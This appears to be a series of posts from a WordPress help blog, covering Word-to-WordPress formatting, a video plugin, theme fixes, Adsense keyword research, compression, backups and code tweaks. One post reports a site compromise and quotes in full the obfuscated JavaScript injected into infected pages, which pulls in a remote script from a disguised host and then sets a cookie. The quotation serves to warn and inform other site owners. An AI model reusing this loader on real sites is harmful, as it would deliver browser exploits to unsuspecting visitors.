I have been contacted by people numerous times when their blogs were “broken” and they needed it fixed.  There have been a variety of reasons behind the damage, but one common cause I’ve seen is through the misuse of Microsoft Word.

Like many other people, I do a lot of my writing in MS Word.  There is nothing wrong with using Word to hammer out your blog posts, the problem lies when you transfer your post from Word to WordPress.

Bad things can happen if you transfer content from MS Word to WordPress the wrong way.  So please please, pretty please with sugar on top, never copy and paste your post from Word directly into WordPress!

When you copy and paste your content from Word, you are copying the formatting as well.  If this formatting is pasted directly into the post editor, your content may appear as it’s supposed to in the WYSIWYG editor, but things will most likely get funky when you hit that “publish” button.  I have seen entire blogs become invisible due to the underlying formatting from Word.

If you’re going to copy and paste your blog posts from Word into your blog, then either paste the content into notepad first (and then copy and paste the notepad content into your blog) or use the built in Word clipboard found in your WYSIWYG editor.

After pasting the content into the Word clipboard, I usually click over to the html view just to ensure that there is no funny business left behind from Word.  Once I’ve assured that everything looks clean, then I’ll head to the publish button.

So if you are copying your posts from Word into WordPress and your blog starts to look a little funky, check to see that you’re not adding anything to your posts that you shouldn’t be.

I did a small update to the Universal Video plugin this afternoon.  Not a lot was changed in this release, but a requested feature has been included.

Now that iOS has been updated to 4, it should be safe to include poster images with HTML5 video and not prevent playback on devices such as the iPad.  Inserting a poster image is as simple as embedding video with this plugin.

Just as you upload the .ogg and .mp4 video types to the “wp-content/uploads” folder, you can also upload a poster image to this same directory as well.  The poster image can be named anything; it does not have to be named the same as the videos.  An example of the shortcode you would use now to include a poster image with your HTML5 video would be:

[video src="funnycats" height="360" width="480" poster="fuzzy-kitty.jpg"]

And just like that, you’ll have HTML5 video embedded into your post with the “fuzzy-kitty.jpg” cover image.

Hopefully this update clears up some issues with video playback on IE as well. Looking back over the code for the plugin I noticed that I may have set the wrong location for the Flowplayer script which would cause problems for the flash version to play. The location is correct now, so please update now to clear up any issues you may have had with the initial release.

And as always, if you have any questions or comments about this plugin, feel free to get in touch with me.

Earlier tonight I had the pleasure of sitting in on Emily Grosvenor’s class on Beginning Blogging.  Emily is a talented writer who runs a great blog at Desperately Seeking Salem, so I knew she would do a bang up job guiding others into the rewarding and frustrating world of blogging.

A point that often comes up with people just getting into blogging is to start off with a free blog at WordPress.com or Blogger and later moving up to your own self-hosted platform.  I think that is great advice, and I have no problem with it whatsoever.  But I do express a little concern at what I heard someone else mention at the meeting, and that is to start off with a free blog at Blogger to get your feet wet, and then later move on to hosting your own blog with WordPress.

Let me give you a little background as to why I’m opposed to switching horses in midstream like this.  I have been known to migrate blogs from time to time.  I’ve moved blogs from one domain to another, and I’ve also moved blogs from one type of blogging platform to another.  While this is in no way an impossible task, I seriously recommend starting off with WordPress.com if you plan on self hosting with WordPress at a later date for two reasons.

First, if you learn the ropes of blogging with a free blog on WordPress.com you are going to handle the transition to self-hosted WordPress blogging much, much easier.  You will already be familiar with the admin backend, how the posting procedures work, and how to navigate and control the settings of your blog.

If you were to start your blogging adventure with Blogger and then move over to WordPress, you will probably be lost and confused for a time while trying to learn a new blogging platform.  It doesn’t make sense to train yourself on one piece of software if you are planning on using a different one later down the road.

Secondly, blog migrations have many crucial aspects that have to be followed carefully in order to be successful.  WordPress and Blogger use different permalink structures, and while you can modify the WordPress format to use the permalink style that Blogger does, I think it is easier and safer to stick with the WordPress way.

You could just leave your old blog and start fresh when you decide to self-host, but why leave all your hard work behind?  It doesn’t take a whole lot to bring your old content into your new blog and redirect your free blog to your shiny new one.  And by migrating your blog and redirecting your old one you will retain the audience that you have built up so far.

My advice to new bloggers?  Check out a Blogger or WordPress.com and see which one you like more.  And when you do decide to take total control of your blog, stick with the same blogging software you started with.

If you are a WordPress user who also happens to use the Thesis theme, chances are you may have run into a snag if you upgraded to WordPress 3.0.  Specifically, I’m referring to the inability to access the “Custom File Editor” of Thesis that happens after you upgrade.

The error message that appears on your screen after clicking on the file editor gives a pretty big hint as to where the problem lies.  But if you don’t want to be bothered with any kind of explanation of what the problem is (like me) and just want to fix it, then read on.

The problem lies in the admin.php file in the /lib/admin folder of the Thesis theme.  What you have to do is open up the admin.php file in the text editor of your choice and locate this section:

function thesis_options_head() {
	wp_enqueue_style('thesis-options-stylesheet', THESIS_CSS_FOLDER . '/options.css'); #wp

	if ($_GET['page'] == 'thesis-file-editor') {
		require_once(ABSPATH . 'wp-admin/includes/misc.php'); #wp
		wp_enqueue_script('color-picker', THESIS_SCRIPTS_FOLDER . '/jscolor/jscolor.js'); #wp

		if (function_exists('use_codepress'))
			wp_enqueue_script('codepress');

		if (use_codepress()) add_action('admin_print_footer_scripts', 'codepress_footer_js');
	}

You need to comment out the line about using codepress like so:

function thesis_options_head() {
	wp_enqueue_style('thesis-options-stylesheet', THESIS_CSS_FOLDER . '/options.css'); #wp

	if ($_GET['page'] == 'thesis-file-editor') {
		require_once(ABSPATH . 'wp-admin/includes/misc.php'); #wp
		wp_enqueue_script('color-picker', THESIS_SCRIPTS_FOLDER . '/jscolor/jscolor.js'); #wp

		if (function_exists('use_codepress'))
			wp_enqueue_script('codepress');

		// if (use_codepress()) add_action('admin_print_footer_scripts', 'codepress_footer_js');
	}

After commenting that one line out, save the file and overwrite the admin.php file on your server and everything will return to being groovy.

In case you haven’t heard, I released a plugin for easily embedding HTML5 video in WordPress blogs.  I think you’ll find that adding video to your blog will be super easy with the aid of this plugin, and it will probably encourage you to use video more often.

HTML5 video is a little different than the flash videos you see almost everywhere on the internet.  When you embed video in the new way, you are allowing just about everyone to see your videos (even those using iPhones or iPads).

So if you want to change how you use video on your blog, I encourage you to give Universal Video a try!

The following information uses a newly created Adsense site I created on Burkitt lymphoma as an example. While the information is sound, your mileage may vary.

Building a website that is designed to bring in revenue from the Adsense ads you place on it can be a worthwhile project that can bring you a seemingly endless supply of extra revenue.  But if you go about this process in the wrong way, you’ll find that the results you were after may never materialize.

I separate this process of creating sites designed for Adsense into three steps, and I will focus on the first and most important step in this post.

Keyword Research and Competitiveness

Choosing the right keyword or niche is of vital importance.  There is no point in launching a brand new site within a highly competitive and broad market because the chance of your new site ever attracting any attention is slim to none.  No, you have to target narrowly defined niches with little to moderate competition if you want to stand a chance.

I like to use the Google Adwords Keyword Tool to help find a profitable niche to build a website on.  You use this online tool by entering in a keyword or phrase, and Google lists that term and related terms along with other information such as the number of monthly search queries (guage the traffic) and the average cost per click that advertisers pay.

The key to finding a good niche to develop on is to find the keyword phrase that receives at least moderate traffic while not being overly competitive.  Results to avoid look like this:

The Google information listed for my example site on Burkitt’s lymphoma is:

Now you probably noticed that the competition level for my site is high, but a high competition level isn’t always a bad thing; they can be overcome in the right situations.  If you run a Google search for “burkitt lymphoma” there are only about 500,000 pages listed.  That’s a little more than I would have liked to see, but not enough to stop my efforts.

In contrast, the keyword “attorney” in the first image has about 150 million listings related to that keyword.  I wouldn’t even think about trying to get a brand new Adsense site ranked in that mess.

After you discover a search term or multiple terms that are reachable, check into the average CPC (Cost per click) for the term.  Obviously, the higher the monetary amount the better.  I wouldn’t even mess with a term that had an average CPC of 5 cents; I’m looking for terms that pay a few dollars or more per click.

After doing this research you should hopefully have at least a few terms chosen that would be ideal to create an Adsense site for.  Now you need a domain for them.

Go to whoever you register websites with (I currently switched to NameCheap instead of Godaddy) and search for a domain based on your keywords.  For example, if your chosen keyword phrase is “camera surveillance equipment”, then you ideally would want the domain “camerasurveillancequipment.com”.  If the .com domain is not available, then try for .net or .org.  You could maybe even go with a .us domain name, but that’s as far as I would take it.  I don’t recommend other extensions such as .biz or .info for our purposes in this.

So if all goes well, you will have narrowed down a niche to target and have now acquired the keyword rich domain names to go along with them.  What’s next, you ask?  That will be the topic of the next post!

Today I decided to try something different with this blog. I decided to remove the WP Super Cache plugin and just try server compression instead.  And so far I am very pleased with the results.

I tend to use the caching plugin on any WordPress site I set up.  I don’t always do this because the blog has a lot of traffic and needs it; I do it just so the blog’s responsiveness is as quick as possible.  After today though I’m totally rethinking that strategy.

If you read the post about 5 Quick Tweaks To Improve Your WordPress Blog, you might remember me mentioning using zlib compression to boost your page loading speed.  I tried it in the past, but it didn’t really work for me.  Today I can admit (with a little bit of embarrassment) that it didn’t work back then because I didn’t set it up right.

For zlib compression to work, you have to have the PHP configured correctly on your server.  How you get this to work may vary depending on what type of server or hosting you have, but I will tell you the steps I took to get it to work on my server.

First of all, I’m hosting on Hostgator and I’m using a CentOS server.  If you are using a hosting provider that is using a Linux server and has Cpanel, then the steps I took just may be the ones you would have to take to accomplish this as well.

After logging into my Cpanel, I scrolled down to the “Software/Services” section and clicked on the php.ini settings

At the top of the page of the php.ini QuickConfig page, the zlib compression option is quickly visible.  Mine was set to “Off”, so I just checked the radio button for “On” instead and then saved my settings.

After doing this, I added the following little piece of code to thevery  top of my header.php file, above the doctype html tag in my WordPress theme folder:

<?php
ini_set('zlib.output_compression', 'On');
ini_set('zlib.output_compression_level', '1');
?>

And that is all that it takes!  I did deactivate the WP-Super-Cache plugin and then deleted the files from my site and I think that this site is running just as fast, if not faster, than it did with just the caching enabled.

I even tested this site here to see what kind of gains I’ve made by enabling zlib compression.  According to them, this blog runs nearly 4 times faster than it did without compression.

So if your blog isn’t getting hammered by Digg or Stumbleupon every day, and you want to keep the amount of plugins you use to a minimum, I would recommend you implement some form of compression over a caching plugin.

I received an email from someone this morning asking me to correct a problem on their WordPress site.  This in of itself is not unusual, but what I found when I went to their site was unusual.  In fact, it was cause for alarm.

The design issue was easy enough to fix, but I received warning messages from Google Chrome when entering their website and Avast was popping up warnings telling me it was blocking a malicious script.  I thought to myself, “That’s odd, it shouldn’t be doing that.”  I looked at another WordPress website on his server and got the same warnings.

I looked at the source code for the homepage of each WordPress website and couldn’t help but notice a fat little script injected at the bottom of the page right before the closing body tag.  The code read as follows:

<script>function NeqatiqavWevpp (ZilitepicaWmufed) { var PisudwodVayora = document.cookie.indexOf (';', ZilitepicaWmufed); if (PisudwodVayora == -1) PisudwodVayora = document.cookie.length; return unescape(document.cookie.substring(ZilitepicaWmufed, PisudwodVayora)); } function KfyoFegih (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return NeqatiqavWevpp (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function FeyedoQgof (name, value) { var argv = FeyedoQgof.arguments; var argc = FeyedoQgof.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (KfyoFegih('o') == null) { var KipidBaqetogaf = 'FJVDLCZWJiCUOKnRWDFXRsACNLWIZDStOVOWFGFaBLOUIlAJRYEINEQAlYWKU-YFKOSDILMaGYCAACYdOZPSoYDGSLXbKYTOQDBLUTeFXGPH-XYYOIEQNEfBSFBlTHVOBIUNJaNYYQYAUNDsNXTZJVJIhTXNJ.XXCJIDLPMcUUPOXQHQZoOSLm'.replace(/[A-Z]/g,''); var PiqoczuDerrqar = document.createElement('script'); PiqoczuDerrqar.src = 'http://' + KipidBaqetogaf + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random() + '&fromsrv=1'; document.getElementsByTagName('head')[0].appendChild(PiqoczuDerrqar); var GakileyiqDokodizu = new Date (); GakileyiqDokodizu.setTime(GakileyiqDokodizu.getTime() + (8*3600*1000)); FeyedoQgof('o','1',GakileyiqDokodizu, '/'); }</script>

I called the person who emailed me to inform him of this hack and he told me that he received an email earlier this morning notifying him that many WordPress files had been changed (he uses the WordPress File Monitor plugin).  In the email, it said the following files had been changed:

wp-login.php
wp-app.php
wp-links-opml.php
wp-settings.php
testrssfeed.php
readme.html
wp-admin/install.php
wp-admin/admin-footer.php
wp-admin/sidebar.php
wp-admin/press-this.php
wp-admin/upgrade.php
wp-admin/setup-config.php
wp-admin/import/blogware.php
wp-admin/import/livejournal.php
wp-admin/maint/repair.php
wp-admin/includes/media.php
wp-admin/includes/template.php
wp-includes/functions.php
wp-includes/js/codepress/codepress.html
wp-includes/js/tinymce/wp-mce-help.php
wp-includes/js/tinymce/blank.htm
wp-includes/js/tinymce/plugins/media/media.htm
wp-includes/js/tinymce/plugins/inlinepopups/template.htm
wp-includes/js/tinymce/plugins/wpeditimage/editimage.html
wp-includes/js/tinymce/plugins/paste/blank.htm
wp-includes/js/tinymce/plugins/paste/pastetext.htm
wp-includes/js/tinymce/plugins/paste/pasteword.htm
wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm
wp-includes/js/tinymce/themes/advanced/link.htm
wp-includes/js/tinymce/themes/advanced/source_editor.htm
wp-includes/js/tinymce/themes/advanced/anchor.htm
wp-includes/js/tinymce/themes/advanced/color_picker.htm
wp-includes/js/tinymce/themes/advanced/charmap.htm
wp-includes/js/tinymce/themes/advanced/about.htm
wp-includes/js/tinymce/themes/advanced/image.htm
wp-content/plugins/wp-pagenavi/readme.html
wp-content/plugins/membership-subscription-management/byrd_rolessubscription
s/database/index.html
wp-content/plugins/membership-subscription-management/byrd_rolessubscription
s/database/database/index.html
wp-content/plugins/role-scoper/RoleScoper_UsageGuide.htm
wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Search/Query.
php
wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Document/Html
.php
wp-content/plugins/featured-category/featcat_admin.php
wp-content/uploads/2010/01/Author-posts.html
wp-content/themes/classic/comments-popup.php
wp-content/themes/classic/footer.php
wp-content/themes/mpdailyfix/comments-popup.php
wp-content/themes/mpdailyfix/footer.php
wp-content/themes/default/comments-popup.php
wp-content/themes/default/footer.php

As of right now we’re looking into restoring the sites back to their original state.  And changing all logins and passwords as I’m not sure what this script has done or what it has gained access to.

I should also note that many of the sites infected are running the current version of WordPress (2.9.1) and I didn’t find any references to this script on Google.  It’s entirely possible that this is a new WordPress hack.

If you find your WordPress site(s) suddenly pop up with warnings when you go to them, check your source code and look for anything out of the ordinary.  Or have someone else look into it for you.  And using the WordPress File Monitor plugin is a great idea for security purposes.  If you don’t currently use a file monitoring program, then I recommend you check into this one.

Update: Maybe this is not a “new” WordPress hack, but it is the result of a malicious PHP file.  The hosting company which manages the server employed in this attack responded with the following:

In reviewing the server’s configuration it was discovered that “Allow FTP logins to all accounts using the root password” was enabled in the server’s WHM configuration.

The attacker appears to have compromised the server’s root password. The root password has been changed.

All accounts were affected by a malicious script insertion attack. An attacker was able to upload a malicious PHP file via FTP. This file was then executed and used to insert the malicious script into each site on the server.

The “Allow FTP logins to all accounts using the root password” setting has been disabled and the removal of the script from all accounts on the server has been completed.

What the script does:

This script executes a malicious javascript package hosted on a remote server in the context of the user’s browser. This script is designed to run browser exploits against outdated web browsers with known vulnerabilities. Thus anyone who visited any of the infected sites with an out of date browser, may have had malware/viruses installed on their local computer. Once a local computer is compromised, the malware will begin searching the local computer’s hard drive for saved passwords so that it can repeat the process by uploading itself to other FTP accounts.

This is type of attack has, unfortunately, become quite common. For a more detailed explanation of how this type of malware works please see:
http://www.viruslist.com/en/weblog?weblogid=208187897

You are recommended to run anit-virus and spy-ware detection software on your local computer.

Being the resident computer expert in the family, I found myself over at my father-in-law’s house yesterday with the purpose of ridding his home PC from the icy cold grip of a few computer viruses.  What I had hoped would be a quick process turned into a lengthy and frustrating procedure that lasted until the next day.  Eventually I had to wipe the operating system from the computer without the ability to make a backup first.

This got me to thinking about how so many people are open to the same kind of thing with their blogs or websites.  I’m not referring to viruses infecting websites; I’m referring to not having backups in case the worst-case scenario was to suddenly rear its ugly head.  If the server hosting your website was to crash and your entire site’s data was lost, would you be prepared for something like that?

Let me give you another real world example of this.  About 2 years ago when I was working for a company that operated an online business selling wholesale sunglasses (that link is not them, but a new site I’m starting), we outsourced some of our blog work to this one guy in India.  While we continued to provide the content for our blogs, he handled the management and hosting of a few of the blogs.  One day there was a server crash and the database and files were lost and then we were informed that he had not kept any database or file backups and neither had the hosting company!

Understandably, we were not happy.  One of the blogs had been established for a couple of years and had a couple hundred posts attached to it.  It became my job to rebuild the blog to its former self and I had to do this from Google’s cache of the site.  It took several really long days, but I was able to recreate most of the blog’s content from what Google had cached.

If you want to avoid the stress and heartache that comes with the loss of your entire website, then you need to be diligent in keeping backups of your entire site.  If you run a blog (and you really should), then that means backing up files AND the database.  Fortunately, it’s really not difficult to backup your files as needed.

If you’re hardcore, you can manually backup your files and database as often as needed.  This is the way I do my backups, but just because I do it this way doesn’t mean you have to do it this way.  There are several plugins available with WordPress that can assist you in backing up your necessary files.

If you backup your WordPress site manually like me, then the only files you really need to backup are your wp-content folder.  This folder contains your theme files, images used in posts, and all your plugin files.  If you were to lose all your files, these are the only ones you would need to recreate your site to its original splendor.

To backup a database manually, I just navigate to the site’s PHPMyAdmin area, select the database, export the file and save it to my computer.  With the files from the wp-content folder and the database SQL file I am able to recreate my WordPress site if the unthinkable were to happen.

If you choose to use a plugin for your backup needs (and there is absolutely nothing wrong with this) then you have a few to choose from.  Here are a few of the more popular ones:

• WP-DB-Backup
• DBC Backup
• WP S3 Backups
• eFiles Backup
• WordPress Backup
• WordPress EZ Backup
• WordPress Automatic Online Backup

Personally, if I were to use a plugin I would choose the WordPress Backup plugin, as it backs up the database as well as images, plugins and theme folders.

It is important to remember that if you only backup the database with your WordPress blogs and try to restore a site with them, then any posts or pages that call for an image will have no pictures to accompany them.  The database will fill the posts with the original text, but it will call for images that are no longer there (unless you backed them up and restored them as well!)

I know this is a rather brief overview on backing up a WordPress site, but if you have any questions or tips feel free to use the comment section to address them.

WordPress is great right out of the box, but the default setup leaves many areas for improvement.  Here are just 5 things you could do to boost performance, SEO or usability.

Boost your page serving speed

You can use a caching plugin to speed up your blog, but you could also add a snippet of code to the top of your header.php theme file to dramatically make improvements as well.  If your web server supports zlib compression, add this to the very top of your theme’s header.php file for a quick boost:

<?php
ini_set('zlib.output_compression', 'On');
ini_set('zlib.output_compression_level', '1');
?>

Source

Split up your RSS feed

RSS feeds are great for keeping up with what’s going on, but what if your readers want the latest on just one of your categories?  You can easily create a linkable list of category feeds with a quick addition of code.  Decide where you want to list your individual feeds (the sidebar perhaps?) and insert this where you want it:

<?php wp_list_cats('sort_column=name&optioncount=1&feed=RSS'); ?>

The default appearance is rather ugly if you ask me, so some CSS styling would be in order after doing this. Source

Remove post revisions

I really don’t like my WordPress databases being littered with unnecessary clutter, and one of the biggest offenders are the post revisions.  That’s why I like to nip this one in the bud every time I do a fresh install of WordPress.  You can stop the accumulation of post revisions by adding this line to your wp-config.php file when you do your install:

define('WP_POST_REVISIONS', false);

Source

Remove the WordPress version in the header

Your WordPress blog will be a little more secure if you don’t broadcast to the world what version of the software you are using.  By default, WordPress inserts a tag in the header declaring the version number.  Remove this tag by going to your blog theme’s functions.php file and adding this line to it:

remove_action('wp_head', 'wp_generator');

Source

Add breadcrumb navigation

Breadcrumb navigation is good for visitors and good for SEO.  You can use a plugin to enable this feature, or you could avoid adding yet another plugin and coding this in manually.  Open up your theme’s functions.php file again and enter the following code:

function the_breadcrumb() {
 if (!is_home()) {
 echo '<a href="';
 echo get_option('home');
 echo '">';
 bloginfo('name');
 echo "</a> » ";
 if (is_category() || is_single()) {
 the_category('title_li=');
 if (is_single()) {
 echo " » ";
 the_title();
 }
 } elseif (is_page()) {
 echo the_title();
 }
 }
}

Then open up your theme’s single.php file and enter this code where you want the breadcrumb navigation displayed:

<?php the_breadcrumb(); ?>

Again, this would also need a touch of CSS styling in order to remove the ugly from it. Source

What tricks do you have in the bag for tweaking your WordPress blog?  Do you have any tips to add to this short list?